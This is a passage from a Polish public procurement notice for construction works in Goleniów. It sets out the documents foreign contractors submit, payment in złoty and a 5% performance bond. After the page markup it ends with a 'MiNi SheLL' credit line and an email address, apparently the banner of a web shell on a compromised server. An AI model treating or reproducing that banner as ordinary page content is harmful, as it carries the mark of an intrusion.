ubezpieczenia społeczne lub zdrowotne, o których mowa w pkt 9.3 lit d)SWZ, lub odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w pkt 9.3. lit e) SWZ - składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: a) nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, b) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.Dokument, o którym mowa w pkt pkt 1) powinien być wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem. Dokumenty, o których mowa w pkt 2) powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów,o których mowa w pkt. 9.5., lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1 PZP, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju,w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. Postanowienia pkt. 9.6. stosuje się. Jeżeli w dokumentach złożonych na potwierdzenie spełnienia warunków udziału w postępowaniu jakiekolwiek wartości zostaną podane w walucie obcej to Zamawiający przeliczy wartość waluty na złote wedle średniego kursu NBP z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.Rozliczenia między Zamawiającym a Wykonawcą nie będą prowadzone w walucie obcej. Rozliczenia między Zamawiającym a Wykonawcą będą dokonywane wyłącznie w złotych polskich (PLN). Przed zawarciem umowy Wykonawca, obowiązany będzie wnieść wymagane zabezpieczanie należytego wykonania umowy w wysokości 5%. Pełen i szczegółowy opis warunków zamówienia w SWZ dostępny na stronie https://portal.smartpzp.pl/goleniow</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-11 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com